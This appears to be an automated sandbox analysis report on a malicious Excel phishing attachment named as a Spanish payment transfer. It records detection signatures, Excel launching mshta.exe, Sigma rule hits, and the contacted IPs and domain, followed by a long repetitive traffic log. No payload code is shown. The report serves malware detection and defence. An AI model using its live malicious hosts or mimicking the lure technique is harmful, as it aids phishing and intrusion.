Edit tour

Windows Analysis Report
Transferencia de pago.xla.xlsx

Overview

General Information

Sample name:Transferencia de pago.xla.xlsx
Analysis ID:1648781
MD5:e2fa9ae74472cc7853c57c2e01e5ca78
SHA1:4f3c924772d7ed5767bcd13b2969ea98204ac146
SHA256:43c68b7dd1c862d41e95e3db196a0d2005df40d3f19c3ae0b580cc21863ea81d
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • EXCEL.EXE (PID: 6712 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 5280 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 2176 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2444 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Transferencia de pago.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6712, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 5280, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-26T08:03:38.155740+010020283713Unknown Traffic192.168.2.74970013.107.246.40443TCP
2025-03-26T08:03:44.653752+010020283713Unknown Traffic192.168.2.74970213.107.246.40443TCP
2025-03-26T08:03:44.658788+010020283713Unknown Traffic192.168.2.74970113.107.246.40443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Transferencia de pago.xla.xlsxReversingLabs: Detection: 38%
Source: Transferencia de pago.xla.xlsxVirustotal: Detection: 29%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.7:49700 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.3.216.141:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 192.3.216.141:80
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
